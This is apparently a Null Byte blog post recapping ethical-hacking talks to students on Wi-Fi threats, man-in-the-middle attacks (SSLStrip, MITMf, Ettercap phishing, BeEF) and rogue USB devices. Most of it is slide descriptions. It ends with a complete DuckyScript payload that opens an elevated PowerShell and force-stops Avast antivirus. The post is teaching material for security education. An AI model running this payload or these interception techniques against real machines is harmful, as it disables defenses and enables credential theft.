Header Banner
Null Byte Logo
Null Byte
wonderhowto.mark.png
Cyber Weapons Lab Forum Metasploit Basics Facebook Hacks Password Cracking Top Wi-Fi Adapters Wi-Fi Hacking Linux Basics Mr. Robot Hacks Hack Like a Pro Forensics Recon Social Engineering Networking Basics Antivirus Evasion Spy Tactics MitM Advice from a Hacker

Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky

Oct 3, 2017 08:23 AM
Oct 16, 2017 03:16 PM
Person giving a presentation to an audience in a classroom setting.

Null Byte users have often requested video content, but the question has always been what format would best serve our community. This week, we partnered with Null Space Labs, a hackerspace in Los Angeles, to test the waters by hosting a series of talks on ethical hacking for students in Pasadena Computer Science Club. We invited students and Null Byte writers to deliver talks on Wi-Fi hacking, MITM attacks, and rogue devices like the USB Rubber Ducky.

A group of people sitting at tables in a well-lit workshop or meeting space.

Pasadena CS Students attend Null Byte and Null Space Labs's Ethical Hacking talk.

NSA Headquarters wall outlet.

Our "Google Starbucks" network demonstrating how to capture wireless hosts.

Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky

Kody Kinzie explains the attackers behind Wi-Fi hacking.

Person presenting in front of an audience with a projection screen displaying technical information.

Ian explaining how to encode IP addresses to hide them from firewalls.

A group of people sitting at tables in a well-lit workshop or meeting space.

Pasadena CS Students attend Null Byte and Null Space Labs's Ethical Hacking talk.

NSA Headquarters wall outlet.

Our "Google Starbucks" network demonstrating how to capture wireless hosts.

Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky

Kody Kinzie explains the attackers behind Wi-Fi hacking.

Person presenting in front of an audience with a projection screen displaying technical information.

Ian explaining how to encode IP addresses to hide them from firewalls.

While our first live stream started slightly delayed, our group of writers and students is excited to bring you the first of our workshops and presentations. Below, you can catch the recorded streams of the events, as well as the decks from each talk where applicable.

Wi-Fi Hacking: Who Hacks Wi-Fi & What Tools Do They Use?

By Kody Kinzie

Person presenting at a seminar with a projector screen displaying text.

Kody Kinzie speaks on Wi-Fi hacking threats in 2017

Use of Wi-Fi is incredibly widespread in 2017. In the city of Los Angeles alone, there are hundreds of thousands of wireless networks, many of which touch critical infrastructure. Kody Kinzie is a CS student researching Wi-Fi security, and the tactics people use to break it.

Kody explains the tactics currently used to break or bypass the technology that makes Wi-Fi secure, and the motivations behind groups who hack Wi-Fi in 2017. In addition, the basic tools used by each threat group are discussed relative to how much skill is required to use them.

Wi-Fi Threats and Hacking Tactics for 2017 presentation title slide
Security researcher and Null Byte editor specializing in Wi-Fi network analysis and team management.
Description of Wi-Fi hacking techniques and methods.
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
What is at stake when your Wi-Fi is compromised?
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
Opponent threat levels pyramid diagram.
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
"Overview of attacks used by smart threats targeting Wi-Fi passwords."
Attacks used by Smart Threats: GPU password cracking techniques and methods.
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
Attacks used by Smart Threats: Wi-Fi Pineapple, Karma Attack, and WiFi Jamming techniques.
List of attacks used by smart threats, featuring USB Rubber Ducky and exploitation techniques.
Image of individuals working at computers in a professional setting, discussing advanced persistent threats and cyber security strategies.
"Overview of cyber attack methods used by APTs including breakdown vulnerabilities and espionage strategies."
Tools used by attackers, including wireless adapters, Linux systems, drones, and Raspberry Pi.
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
Wi-Fi threats and hacking tactics presentation title 2017
Wi-Fi Threats and Hacking Tactics for 2017 presentation title slide
Security researcher and Null Byte editor specializing in Wi-Fi network analysis and team management.
Description of Wi-Fi hacking techniques and methods.
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
What is at stake when your Wi-Fi is compromised?
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
Opponent threat levels pyramid diagram.
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
"Overview of attacks used by smart threats targeting Wi-Fi passwords."
Attacks used by Smart Threats: GPU password cracking techniques and methods.
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
Attacks used by Smart Threats: Wi-Fi Pineapple, Karma Attack, and WiFi Jamming techniques.
List of attacks used by smart threats, featuring USB Rubber Ducky and exploitation techniques.
Image of individuals working at computers in a professional setting, discussing advanced persistent threats and cyber security strategies.
"Overview of cyber attack methods used by APTs including breakdown vulnerabilities and espionage strategies."
Tools used by attackers, including wireless adapters, Linux systems, drones, and Raspberry Pi.
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
Wi-Fi threats and hacking tactics presentation title 2017

Check out these related articles:

MITM Attacks: Network Sniffing Over Routers/Switches

By Ian O'Neill

A group of people attentively listening to a speaker in a classroom setting.

Ian O'Neill explains MITM attacks to computer science students.

Man in the Middle attacks intercept and redirect traffic, and can be extremely dangerous when employed correctly. Ian O'Neill explains in detail the fundamentals of a MITM attack, from creating a fake network to downgrading HTTPS connections to HTTP.

MITM attacks continue to present a viable threat when users fall for phishing and ignore warnings, in spite of the trend towards HTTPS and more secure internet connections. Take a trip to the dark side with us to explore the hands-on ways an attacker can employ an effective MITM attack.

Network Sniffing over Routers and Switches article header
Diagram illustrating a Man in the Middle attack showing traffic interception between client and server.
MiTM Obstacle Summary: SSL, HSTS, and AdBlockers - Interception of encrypted content and spoofing methods.
Techniques used in cybersecurity: downgrading SSL/HTTPS to HTTP, redirecting users to phishing pages, and injecting malicious JavaScript.
List of cybersecurity tools used in network analysis.
"Slide on network security techniques including ARP discovery daemon stopping, hostname modification, and MAC spoofing commands."
Network enumeration commands and examples for subnet scanning.
Port forwarding configuration commands and IP tables flushing instructions.
Packet capturing instructions using TCPDump and Wireshark.
ARP Spoofing explanation with code syntax and network diagram.
Running SSLStrip+: Forcing HTTPS to HTTP traffic where possible using Python script.
DNS2Proxy tool explanation for bypassing SSL on HSTS sites.
Parsing data instructions with search terms and value examples.
Demo One - Dns2Proxy and SSLStrip+
Code snippet showing grep command results for parsing data related to passwords.
Alternate Method Using MITMF - The Easy Way
Alternative text: "Slide detailing features of MITMF including SSLStrip, Spoofing, ImageRandomizer, ISkeylogger, and BrowserSniper."
MITMF Plugins List: Includes information on various plugins such as EEF/Metasploit Integration, Captive Portal, ScreenShoter, BrowserProfiler, AppCachePoison, FilePlan, and Ferret-NG.
List of MITMF plugins with brief descriptions.
MITMf tool commands for network spoofing and ARP gateway setup.
DNS Spoofing and Phishing using Ettercap
Phishing page configuration instructions using Social Engineering Toolkit.
Ettercap and PHP Configuration Instructions for DNS and Phishing Pages
Ettercap Phishing Demo
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
Integration with BeEF Framework: Use browser exploits and avoid SSL and AdBlockers.
BeEF obfuscation information with IP encoding and various number formats.
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
BeEF Modules and their functions related to web security.
BeEF Modules Overview: Detection of popup blockers, HTTP conversion, webcam usage, browser extensions, PDF hooks, antivirus, and social network authentication.
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
Network Sniffing over Routers and Switches article header
Diagram illustrating a Man in the Middle attack showing traffic interception between client and server.
MiTM Obstacle Summary: SSL, HSTS, and AdBlockers - Interception of encrypted content and spoofing methods.
Techniques used in cybersecurity: downgrading SSL/HTTPS to HTTP, redirecting users to phishing pages, and injecting malicious JavaScript.
List of cybersecurity tools used in network analysis.
"Slide on network security techniques including ARP discovery daemon stopping, hostname modification, and MAC spoofing commands."
Network enumeration commands and examples for subnet scanning.
Port forwarding configuration commands and IP tables flushing instructions.
Packet capturing instructions using TCPDump and Wireshark.
ARP Spoofing explanation with code syntax and network diagram.
Running SSLStrip+: Forcing HTTPS to HTTP traffic where possible using Python script.
DNS2Proxy tool explanation for bypassing SSL on HSTS sites.
Parsing data instructions with search terms and value examples.
Demo One - Dns2Proxy and SSLStrip+
Code snippet showing grep command results for parsing data related to passwords.
Alternate Method Using MITMF - The Easy Way
Alternative text: "Slide detailing features of MITMF including SSLStrip, Spoofing, ImageRandomizer, ISkeylogger, and BrowserSniper."
MITMF Plugins List: Includes information on various plugins such as EEF/Metasploit Integration, Captive Portal, ScreenShoter, BrowserProfiler, AppCachePoison, FilePlan, and Ferret-NG.
List of MITMF plugins with brief descriptions.
MITMf tool commands for network spoofing and ARP gateway setup.
DNS Spoofing and Phishing using Ettercap
Phishing page configuration instructions using Social Engineering Toolkit.
Ettercap and PHP Configuration Instructions for DNS and Phishing Pages
Ettercap Phishing Demo
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
Integration with BeEF Framework: Use browser exploits and avoid SSL and AdBlockers.
BeEF obfuscation information with IP encoding and various number formats.
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky
BeEF Modules and their functions related to web security.
BeEF Modules Overview: Detection of popup blockers, HTTP conversion, webcam usage, browser extensions, PDF hooks, antivirus, and social network authentication.
Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky

Check out these related articles:

Rogue Devices: Antivirus Disabler Script on the USB Rubber Ducky

By Tim Schellin

A person presenting at a workshop while others observe.

Tim demonstrates a USB Rubber Ducky payload.

Antivirus is the first line of defense for most systems, allowing even well-crafted malware to be defeated before deploying a payload. Timothy Shellion is a CS student using the USB Rubber Ducky to design payloads to defeat antivirus, and explains what a rogue device like a USB Rubber Ducky is, and how it works.

Timothy demonstrates his simple Duckyscript code to disable antivirus on Windows, and explains how the device can be used to defeat even well-defended systems when physical access is achieved. The potential of this device reach far beyond simply disabling antivirus, and the process of creating a payload for a rogue device is explained.

Rogue Devices by Timothy Schellin
Introduction to rogue devices and their categories.
Rogue Access Points: Unauthorized Wi-Fi access points on a network.
Unauthorized device on network executing an attack.
WiFi Pineapple illustration with prompt about network access.
USB Rubber Ducky overview and functionalities.
USB Rubber Ducky with Micro SD Storage, Replay Button, LED Indicator, Type A Plug, and Optional Decal.
Demonstration of Ducky Script encoding and payload delivery.
Rogue Devices by Timothy Schellin
Introduction to rogue devices and their categories.
Rogue Access Points: Unauthorized Wi-Fi access points on a network.
Unauthorized device on network executing an attack.
WiFi Pineapple illustration with prompt about network access.
USB Rubber Ducky overview and functionalities.
USB Rubber Ducky with Micro SD Storage, Replay Button, LED Indicator, Type A Plug, and Optional Decal.
Demonstration of Ducky Script encoding and payload delivery.

You can see Tim's Duckyscript to disable Windows Antivirus here:

DELAY 300

GUI s

DELAY 300

STRING powershell

DELAY 500

CTRL-SHIFT ENTER

DELAY 500

STRING get-service

ENTER

DELAY 750

STRING stop-service -force "avast! antivirus"

ENTER

DELAY 750

ENTER

DELAY 500

STRING get-service "avast! antivirus"

ENTER

Check out these related articles:

Want More Video Content?

If you enjoyed this and would like to see more video content, let us know in the comments below. Thank you to Null Space Labs, and Pasadena Computer Science Club for helping us put on our first Null Byte event. If you're in the SoCal area and interested in getting involved in our of our talks or workshops, please reach out to us on Twitter!

Cover photo by Null Byte

You already know how to use your phone. With Gadget Hacks' newsletter, we'll show you how to master it. Each week, we explore features, hidden tools, and advanced settings that give you more control over iOS and Android than most users even know exists.

Sign up for Gadget Hacks Weekly and start unlocking your phone's full potential.

Related Articles

Comments

No Comments Exist

Be the first, drop a comment!